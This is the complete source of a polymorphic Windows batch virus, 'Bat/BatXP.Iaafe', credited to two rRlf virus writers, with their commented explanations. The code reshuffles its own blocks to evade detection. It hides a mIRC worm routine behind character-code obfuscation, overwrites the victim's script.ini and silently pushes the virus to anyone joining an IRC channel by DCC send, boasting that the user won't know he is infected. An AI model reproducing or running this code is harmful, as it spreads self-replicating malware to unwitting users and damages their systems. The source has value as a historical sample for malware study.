set generation=0 @echo off % spth-phile % cls % spth-phile % % spth-phile %set /a generation=%generation%+1 % spth-phile %if %generation% EQU 5 ( % spth-phile %echo You are infect with philet0ast3r's and Second Part To Hell's Bat/BatXP.Iaafe! % spth-phile %set generation=0 % spth-phile %) % spth-phile %echo set generation=%generation% >poly.bat :: Bat/BatXP.Iaafe % spth-phile % :: by philet0ast3r[rRlf] & Second Part To Hell[rRlf] % spth-phile % :: % spth-phile % :: philet0ast3r: Virus idea, name idea and the genial random engine :D % spth-phile % :: Second Part To Hell: Included the virus part, encrypt the BAT/VBS part, BatXP workable (workable? +fg+), made this stuff polymporph and the comments % spth-phile % :: % spth-phile % :: Big thanks goes to Lord Yup for writting the the "Silend DCC SEND"-Article { You'll find it in 29A #6 } % spth-phile % :: ------------------------------------------------------------------------------------------------------------------------------------------ % spth-phile % :: General Virus Info: % spth-phile % :: % spth-phile % :: Name of the Virus................................. Bat/BatXP.Iaafe % spth-phile % :: Author............................................ philet0ast3r & Second Part To Hell % spth-phile % :: Size.............................................. 20.194 byte % spth-phile % :: Encrypt........................................... Most of the virus part and something of the random-engine % spth-phile % :: Polymorphism...................................... Yes % spth-phile % :: (possible variants under WinXP (21*20*19*18*17*16*15*14*13*12*11*10*9*8*7*6*5*4*3*2) = 51090942171709440000 = ca. 51 trillion :] ) % spth-phile % :: (possible variants under WinME/98/95 (5*4*3*2) =120 ... because command.com doesn't allow more sets) % spth-phile % :: Spreading......................................... The virus spreads via mIRC, but not the normal "one-line-mIRC-spreading" way, but % spth-phile % :: a much better one. The User won't know, that he's infect. % spth-phile % :: Payload........................................... Every 5th generation the virus shows a shourt text % spth-phile % :: % spth-phile % :: Last words by Second Part To Hell: % spth-phile % :: I nearly commited suicide while writing this virus ;), % spth-phile % :: because i had to fix more than 1.000.000 bugs in this fuckin' program. % spth-phile % :: But I'm sure, i fixed all and now the virus works without mistake. % spth-phile % :: % spth-phile % :: Last words by philet0ast3r: % spth-phile % :: I just want to thank/greet some important persons: % spth-phile % :: breathe for helping me getting the idea how a batch random # generator could work % spth-phile % :: 3ri5, kathi, ina, janine & phily for being real friends (and more ;) % spth-phile % :: Slage Hammer % spth-phile % :: alcopaul % spth-phile % :: the rest of the rRlf and some other ppl, who know me % spth-phile % :: % spth-phile % % spth-phile %set generation= % spth-phile %set qwxykjsi=set % spth-phile %set aaa=A %qwxykjsi% fi=if % spth-phile % %qwxykjsi% nt=not % spth-phile % %qwxykjsi% el=errorlevel % spth-phile % %qwxykjsi% ine=%fi% %nt% %el% % spth-phile % % spth-phile %set vrsa=rndom set oto=goto% spth-phile % %qwxykjsi% a=0 % spth-phile % set fd=find% spth-phile % :: This part makes the set's for the crypt BAT part %fd% "spth-phile"<%0>>poly.bat :: The virus searches for "spth-phile" in every line of itself an :: write this lines to the poly.bat file %qwxykjsi% xp=true% spth-phile % % spth-phile %if %xp% EQU true goto xptruea :: It's a BatXP command, if it's true, the virus goes to the BatXP part goto winparta % spth-phile % :: Else it goes to the Bat part :xptruea % spth-phile % % spth-phile %set a=0 % spth-phile %set b=0 % spth-phile %set c=0 % spth-phile %set d=0 % spth-phile %set e=0 % spth-phile %set f=0 % spth-phile %set g=0 % spth-phile %set h=0 % spth-phile %set i=0 % spth-phile %set j=0 % spth-phile %set k=0 % spth-phile %set l=0 % spth-phile %set m=0 % spth-phile %set n=0 % spth-phile %set o=0 % spth-phile %set p=0 % spth-phile %set q=0 % spth-phile %set r=0 % spth-phile %set s=0 % spth-phile %set t=0 % spth-phile %set u=0 :: This set's are for the poly engine, because the variables can't be nothing :: in an if-part :start0 % spth-phile % % spth-phile %set aa=0 :: aa, the main poly-engine variable is zero :start1 % spth-phile % if %aa% EQU 5 goto endpoly % spth-phile % %qwxykjsi% /a aa=%aa%+1 % spth-phile % :: aa is aa+1 :start2 % spth-phile % ver|time|%fd% ",1">nul % spth-phile % :: Searching after "1" in the current time %ine% 1 %qwxykjsi% %vrsa%%aa%=1% spth-phile % :: If there is no errorlevel, that means, if the searching number in the time :: is 1, the variable %vrsa%(random)%aa%(changes, but at first it's 1) is 1! %ine% 1 %oto% start1 % spth-phile % :: Goto start ver|time|%fd% ",2">nul % spth-phile % %ine% 1 %qwxykjsi% %vrsa%%aa%=2% spth-phile % %ine% 1 %oto% start1 % spth-phile % :: Ones more the same ver|time|%fd% ",3">nul % spth-phile % %ine% 1 %qwxykjsi% %vrsa%%aa%=3% spth-phile % %ine% 1 %oto% start1 % spth-phile % ver|time|%fd% ",4">nul % spth-phile % %ine% 1 %qwxykjsi% %vrsa%%aa%=4% spth-phile % %ine% 1 %oto% start1 % spth-phile % ver|time|%fd% ",5">nul % spth-phile % %ine% 1 %qwxykjsi% %vrsa%%aa%=5% spth-phile % %ine% 1 %oto% start1 % spth-phile % ver|time|%fd% ",6">nul % spth-phile % %ine% 1 %qwxykjsi% %vrsa%%aa%=6% spth-phile % %ine% 1 %oto% start1 % spth-phile % ver|time|%fd% ",7">nul % spth-phile % %ine% 1 %qwxykjsi% %vrsa%%aa%=7% spth-phile % %ine% 1 %oto% start1 % spth-phile % ver|time|%fd% ",8">nul % spth-phile % %ine% 1 %qwxykjsi% %vrsa%%aa%=8% spth-phile % %ine% 1 %oto% start1 % spth-phile % ver|time|%fd% ",9">nul % spth-phile % %ine% 1 %qwxykjsi% %vrsa%%aa%=9% spth-phile % %ine% 1 %oto% start1 % spth-phile % ver|time|%fd% ",0">nul % spth-phile % %ine% 1 %qwxykjsi% %vrsa%%aa%=10% spth-phile % %ine% 1 %oto% start1 % spth-phile % goto start2 % spth-phile % :endpoly % spth-phile % % spth-phile %if %a% NEQ 1 (if %rndom1% EQU 1 ( % spth-phile %find "%aaa%AAA" <%0 >>poly.bat % spth-phile %set a=1 % spth-phile %)) :: The last 4 lines are one if-part. :: If a <> 1 AND if %random1% (you know: %vrsa%%aa%) is 1 then seaching :: after "BBBB" in the whole code, and write it to poly.bat. And changing :: the "a" to 1! So this part of the code won't write ones more to the poly.bat % spth-phile %if %b% NEQ 1 (if %rndom1% EQU 2 ( % spth-phile %find "%aaa%BBB" <%0 >>poly.bat % spth-phile %set b=1 % spth-phile %)) :: The same % spth-phile %if %c% NEQ 1 (if %rndom1% EQU 3 ( % spth-phile %find "%aaa%CCC" <%0 >>poly.bat % spth-phile %set c=1 % spth-phile %)) % spth-phile %if %d% NEQ 1 (if %rndom1% EQU 4 ( % spth-phile %find "%aaa%DDD" <%0 >>poly.bat % spth-phile %set d=1 % spth-phile %)) % spth-phile %if %e% NEQ 1 (if %rndom2% EQU 1 ( % spth-phile %find "%aaa%EEE" <%0 >>poly.bat % spth-phile %set e=1 % spth-phile %)) % spth-phile %if %f% NEQ 1 (if %rndom2% EQU 2 ( % spth-phile %find "%aaa%FFF" <%0 >>poly.bat % spth-phile %set f=1 % spth-phile %)) % spth-phile %if %g% NEQ 1 (if %rndom2% EQU 3 ( % spth-phile %find "%aaa%GGG" <%0 >>poly.bat % spth-phile %set g=1 % spth-phile %)) % spth-phile %if %h% NEQ 1 (if %rndom2% EQU 4 ( % spth-phile %find "%aaa%HHH" <%0 >>poly.bat % spth-phile %set h=1 % spth-phile %)) % spth-phile %if %i% NEQ 1 (if %rndom3% EQU 1 ( % spth-phile %find "%aaa%III" <%0 >>poly.bat % spth-phile %set i=1 % spth-phile %)) % spth-phile %if %j% NEQ 1 (if %rndom3% EQU 2 ( % spth-phile %find "%aaa%JJJ" <%0 >>poly.bat % spth-phile %set j=1 % spth-phile %)) % spth-phile %if %k% NEQ 1 (if %rndom3% EQU 3 ( % spth-phile %find "%aaa%KKK" <%0 >>poly.bat % spth-phile %set k=1 % spth-phile %)) % spth-phile %if %l% NEQ 1 (if %rndom3% EQU 4 ( % spth-phile %find "%aaa%LLL" <%0 >>poly.bat % spth-phile %set l=1 % spth-phile %)) % spth-phile %if %m% NEQ 1 (if %rndom4% EQU 1 ( % spth-phile %find "%aaa%MMM" <%0 >>poly.bat % spth-phile %set m=1 % spth-phile %)) % spth-phile %if %n% NEQ 1 (if %rndom4% EQU 2 ( % spth-phile %find "%aaa%NNN" <%0 >>poly.bat % spth-phile %set n=1 % spth-phile %)) % spth-phile %if %o% NEQ 1 (if %rndom4% EQU 3 ( % spth-phile %find "%aaa%OOO" <%0 >>poly.bat % spth-phile %set o=1 % spth-phile %)) % spth-phile %if %p% NEQ 1 (if %rndom4% EQU 4 ( % spth-phile %find "%aaa%PPP" <%0 >>poly.bat % spth-phile %set p=1 % spth-phile %)) % spth-phile %if %q% NEQ 1 (if %rndom5% EQU 1 ( % spth-phile %find "%aaa%QQQ" <%0 >>poly.bat % spth-phile %set q=1 % spth-phile %)) % spth-phile %if %r% NEQ 1 (if %rndom5% EQU 2 ( % spth-phile %find "%aaa%RRR" <%0 >>poly.bat % spth-phile %set r=1 % spth-phile %)) % spth-phile %if %s% NEQ 1 (if %rndom5% EQU 3 ( % spth-phile %find "%aaa%SSS" <%0 >>poly.bat % spth-phile %set s=1 % spth-phile %)) % spth-phile %if %t% NEQ 1 (if %rndom5% EQU 4 ( % spth-phile %find "%aaa%TTT" <%0 >>poly.bat % spth-phile %set t=1 % spth-phile %)) % spth-phile %if %u% NEQ 1 (if %rndom5% EQU 5 ( % spth-phile %find "%aaa%UUU" <%0 >>poly.bat % spth-phile %set u=1 % spth-phile %)) % spth-phile %if %a% EQU 1 (if %b% EQU 1 (if %c% EQU 1 (if %d% EQU 1 ( % spth-phile %if %e% EQU 1 (if %f% EQU 1 (if %g% EQU 1 (if %h% EQU 1 ( % spth-phile %if %i% EQU 1 (if %j% EQU 1 (if %k% EQU 1 (if %l% EQU 1 ( % spth-phile %if %m% EQU 1 (if %n% EQU 1 (if %o% EQU 1 (if %p% EQU 1 ( % spth-phile %if %q% EQU 1 (if %r% EQU 1 (if %s% EQU 1 (if %t% EQU 1 (if %u% EQU 1 ( goto irca % spth-phile % % spth-phile %))))))))))))))))))))) :: The last 7 lines are one really gigant if-part :) :: If every letter from "a" to "u" is 1, then the file goes to the mIRC part. goto start0 % spth-phile % :: Else it goes to the start0 part (and searches ones more for random-numbers) :winparta % spth-phile % :: Here you can find the normal Bat. If the OS isn't WinXP/Win2000prof, :: the virus will start it's life here. set wina=0% spth-phile % set winb=0% spth-phile % set winc=0% spth-phile % set wind=0% spth-phile % set wine=0% spth-phile % set oto=% spth-phile % set qwxykjsi=% spth-phile % set nt=% spth-phile % set fi=% spth-phile % set el=% spth-phile % set ine=% spth-phile % :: These are some variables for cryption or for the poly-engine :startwin2 % spth-phile % % spth-phile %if not %wina%==1 goto polyengi % spth-phile %if not %winb%==1 goto polyengi % spth-phile %if not %winc%==1 goto polyengi % spth-phile %if not %wind%==1 goto polyengi % spth-phile %if not %wine%==1 goto polyengi :: These 5 lines are doing the same as the big 7-lines-if-part in the BatXP! goto winirc % spth-phile % :polyengi % spth-phile % ver|time|find ",1">nul % spth-phile % if not errorlevel 1 set randoma=1% spth-phile % if not errorlevel 1 goto enpolywin % spth-phile % :: You have to know these lines, because I explained it in the BatXP part ver|time|find ",2">nul % spth-phile % if not errorlevel 1 set randoma=2% spth-phile % if not errorlevel 1 goto enpolywin % spth-phile % ver|time|find ",3">nul % spth-phile % if not errorlevel 1 set randoma=3% spth-phile % if not errorlevel 1 goto enpolywin % spth-phile % ver|time|find ",4">nul % spth-phile % if not errorlevel 1 set randoma=4% spth-phile % if not errorlevel 1 goto enpolywin % spth-phile % ver|time|find ",5">nul % spth-phile % if not errorlevel 1 set randoma=5% spth-phile % if not errorlevel 1 goto enpolywin % spth-phile % goto startwin2 % spth-phile % :enpolywin % spth-phile % % spth-phile %if not %wina%==1 if %randoma%==1 goto enapolywin % spth-phile %if not %winb%==1 if %randoma%==2 goto enbpolywin % spth-phile %if not %winc%==1 if %randoma%==3 goto encpolywin % spth-phile %if not %wind%==1 if %randoma%==4 goto endpolywin % spth-phile %if not %wine%==1 if %randoma%==5 goto enepolywin :: If the variable "wina-e" isn't 1, then if the "randoma" is 1-5, :: the virus goes to an other part of the Bat-poly-engine goto startwin2 % spth-phile % :enapolywin % spth-phile % % spth-phile %find "%aaa%BBB"<%0>> poly.bat % spth-phile %find "%aaa%AAA"<%0>> poly.bat % spth-phile %find "%aaa%KKK"<%0>> poly.bat % spth-phile %find "%aaa%DDD"<%0>> poly.bat set wina=1% spth-phile % :: The virus writes every lines with "ABBB","AAAA","AKKK","ADDD" to the poly-file :: and changes the variable "wina" to 1 % spth-phile %goto startwin2 :enbpolywin % spth-phile % % spth-phile %find "%aaa%EEE"<%0>> poly.bat % spth-phile %find "%aaa%LLL"<%0>> poly.bat % spth-phile %find "%aaa%GGG"<%0>> poly.bat % spth-phile %find "%aaa%HHH"<%0>> poly.bat set winb=1% spth-phile % % spth-phile %goto startwin2 :encpolywin % spth-phile % % spth-phile %find "%aaa%III"<%0>> poly.bat % spth-phile %find "%aaa%JJJ"<%0>> poly.bat % spth-phile %find "%aaa%CCC"<%0>> poly.bat % spth-phile %find "%aaa%FFF"<%0>> poly.bat set winc=1% spth-phile % % spth-phile %goto startwin2 :endpolywin % spth-phile % % spth-phile %find "%aaa%NNN"<%0>> poly.bat % spth-phile %find "%aaa%MMM"<%0>> poly.bat % spth-phile %find "%aaa%PPP"<%0>> poly.bat % spth-phile %find "%aaa%OOO"<%0>> poly.bat set wind=1% spth-phile % % spth-phile %goto startwin2 :enepolywin % spth-phile % % spth-phile %find "%aaa%RRR"<%0>> poly.bat % spth-phile %find "%aaa%SSS"<%0>> poly.bat % spth-phile %find "%aaa%UUU"<%0>> poly.bat % spth-phile %find "%aaa%TTT"<%0>> poly.bat % spth-phile %find "%aaa%QQQ"<%0>> poly.bat set wine=1% spth-phile % % spth-phile %goto startwin2 :winirc % spth-phile % % spth-phile %set wina= % spth-phile %set winb= % spth-phile %set winc= % spth-phile %set wind= % spth-phile %set wine= % spth-phile %set aaa= % spth-phile %set randoma= :: All variables used in the poly-engine are deleted :irca % AAAA % if exist C:\mirc\script.ini set mir=C:\mirc% AAAA % echo %mir% if exist C:\mirc32\script.ini set mir=C:\mirc32% AAAA % if exist C:\proga~1\mirc\script.ini set mir=C:\progra~1\mirc% AAAA % if exist C:\prgra~1\mirc32\script.ini set mir=C:\progra~1\mirc32% AAAA % goto ircb% AAAA % :ircb % ABBB % set mirc=%mir%\script.ini% ABBB % set vs=chr(% ABBB % goto ircc% ABBB % :ircc % ACCC % set wc=echo file.writeline% ACCC % goto ircd% ACCC % :ircd % ADDD % echo dim fso, file > irc.vbs% ADDD % echo set fso = createobject("scripting.filesystemobject") >>irc.vbs% ADDD % echo set file = fso.createtextfile ("%mir%\script.ini", true)>>irc.vbs% ADDD % goto irce% ADDD % :irce % AEEE % %wc% " on 1:st" + %vs%97) + "rt: { ." + %vs%115) + %vs%101) + %vs%116) + " " + %vs%37) + "filee %mir%\name.b" + %vs%97) + "t }">>irc.vbs% AEEE % %wc% " on 1:join:#: { ">>irc.vbs% AEEE % %wc% " .if (" + %vs%36) + "nick != " + %vs%36) + "me " + %vs%38) + "" + %vs%38) + " " + %vs%37) + "old != " + %vs%36) + "nick) {">>irc.vbs% AEEE % goto ircf% AEEE % :ircf % AFFF % %wc% " ." + %vs%115) + %vs%101) + %vs%116) + " " + %vs%37) + "old " + %vs%36) + "nick">>irc.vbs% AFFF % %wc% " .timer " + %vs%36) + "+ " + %vs%36) + "r" + %vs%97) + "nd(1,100000) 1 5 ." + %vs%36) + "check_him( " + %vs%36) + "nick , " + %vs%36) + "ch" + %vs%97) + "n )">>irc.vbs% AFFF % goto ircg% AFFF % :ircg % AGGG % %wc% " } ">>irc.vbs% AGGG % %wc% " }">>irc.vbs% AGGG % %wc% " " + %vs%97) + "li" + %vs%97) + "s check_him {">>irc.vbs% AGGG % goto irch% AGGG % :irch % AHHH % %wc% " ." + %vs%115) + %vs%101) + %vs%116) + " " + %vs%37) + "port " + %vs%36) + "r" + %vs%97) + "nd(9999,999999) ">>irc.vbs% AHHH % %wc% " .while (" + %vs%36) + "portfree(" + %vs%37) + "port) == " + %vs%36) + "f" + %vs%97) + "lse) { ." + %vs%115) + %vs%101) + %vs%116) + " " + %vs%37) + "port " + %vs%36) + "r" + %vs%97) + "nd(9999,999999) }">>irc.vbs% AHHH % goto irci% AHHH % :irci % AIII % %wc% " .%fi% (" + %vs%36) + "1 !isop " + %vs%36) + "2) { ">>irc.vbs% AIII % %wc% " .%nt%ice " + %vs%36) + "1 :DCC " + %vs%115) + %vs%101) + %vs%110) + %vs%100) + " teletubies ( " + %vs%36) + "+ " + %vs%36) + "ip " + %vs%36) + "+ ) ">>irc.vbs% AIII % goto ircj% AIII % :ircj % AJJJ % %wc% " ." + %vs%115) + %vs%101) + %vs%116) + " " + %vs%37) + "sock_n" + %vs%97) + "me " + %vs%36) + "r" + %vs%97) + "nd(1,99999)">>irc.vbs% AJJJ % %wc% " .msg " + %vs%36) + "1 DCC " + %vs%115) + %vs%101) + %vs%110) + %vs%100) + " " + %vs%37) + "filee " + %vs%36) + "longip(" + %vs%36) + "ip) " + %vs%37) + "port " + %vs%36) + "file(" + %vs%37) + "filee).size " + %vs%36) + "+ ">>irc.vbs% AJJJ % %wc% " .socklisten " + %vs%37) + "sock_n" + %vs%97) + "me " + %vs%37) + "port">>irc.vbs% AJJJ % goto irck% AJJJ % :irck % AKKK % %wc% " .timers off">>irc.vbs% AKKK % %wc% " .timer " + %vs%36) + "+ " + %vs%36) + "r" + %vs%97) + "nd(1,99999) 0 10 .cloze">>irc.vbs% AKKK % %wc% " } ">>irc.vbs% AKKK % goto ircl% AKKK % :ircl % ALLL % %wc% " }">>irc.vbs% ALLL % %wc% " on 1:socklisten:" + %vs%37) + "sock_n" + %vs%97) + "me: {">>irc.vbs% ALLL % goto ircm% ALLL % :ircm % AMMM % %wc% " ." + %vs%115) + %vs%101) + %vs%116) + " " + %vs%37) + "client_n" + %vs%97) + "me " + %vs%36) + "r" + %vs%97) + "nd(1,9999999)">>irc.vbs% AMMM % %wc% " .sockclose " + %vs%37) + "sock_n" + %vs%97) + "me">>irc.vbs% AMMM % goto ircn% AMMM % :ircn % ANNN % %wc% " ." + %vs%115) + %vs%101) + %vs%116) + " " + %vs%37) + "l 0">>irc.vbs% ANNN % %wc% " .bre" + %vs%97) + "d " + %vs%37) + "filee " + %vs%37) + "l 4000 " + %vs%38) + "le">>irc.vbs % ANNN % goto irco% ANNN % :irco % AOOO % %wc% " .sockwrite -b " + %vs%37) + "client_n" + %vs%97) + "me 4000 " + %vs%38) + "le">>irc.vbs% AOOO % %wc% " " + %vs%37) + "l = " + %vs%37) + "l + 4000">>irc.vbs% AOOO % goto ircp% AOOO % :ircp % APPP % %wc% " ." + %vs%115) + %vs%101) + %vs%116) + " " + %vs%37) + "end 0">>irc.vbs% APPP % %wc% " }">>irc.vbs% APPP % %wc% " on 1:sockre" + %vs%97) + "d:" + %vs%37) + "client_n" + %vs%97) + "me: {">>irc.vbs% APPP % goto ircq % APPP % :ircq % AQQQ % %wc% " .%fi% (" + %vs%37) + "l >= " + %vs%36) + "file(" + %vs%37) + "filee).size) {">>irc.vbs% AQQQ % %wc% " ." + %vs%115) + %vs%101) + %vs%116) + " " + %vs%37) + "end 1">>irc.vbs% AQQQ % goto ircr% AQQQ % :ircr % ARRR % %wc% " .sockclose " + %vs%37) + "client_n" + %vs%97) + "me">>irc.vbs% ARRR % %wc% " .h" + %vs%97) + "lt">>irc.vbs% ARRR % %wc% " } .else {">>irc.vbs% ARRR % goto ircs% ARRR % :ircs % ASSS % %wc% " .%fi% (" + %vs%37) + "end != 1) {">>irc.vbs% ASSS % %wc% " .bre" + %vs%97) + "d " + %vs%37) + "filee " + %vs%37) + "l 4000 " + %vs%38) + "le">>irc.vbs% ASSS % goto irct% ASSS % :irct % ATTT % %wc% " .sockwrite -b " + %vs%37) + "client_n" + %vs%97) + "me 4000 " + %vs%38) + "le">>irc.vbs% ATTT % %wc% " " + %vs%37) + "l = " + %vs%37) + "l + 4000">>irc.vbs% ATTT % %wc% " } } }">>irc.vbs% ATTT % goto ircu% ATTT % :ircu % AUUU % %wc% " " + %vs%97) + "li" + %vs%97) + "s cloze { .sockclose " + %vs%37) + "sock_n" + %vs%97) + "me } ">>irc.vbs% AUUU % echo file.Close >>irc.vbs% AUUU % cscript irc.vbs% AUUU % cls% AUUU % goto eirc% AUUU % :: This is the whole virus part :: It spreads via mIRC, and is mostly encrypt :eirc % phile-spth % del irc.vbs % phile-spth % find "phile-spth"<%0>>poly.bat copy poly.bat %mir%\name.bat % phile-spth % del poly.bat % phile-spth % cls % phile-spth % :: Last but not least, the virus searchs for "phile-spth" in the viruscode, :: And write it to the poly.bat! Then it copies the poly.bat to the mIRC-dir :: and deletes the irc-vbs and the poly.bat!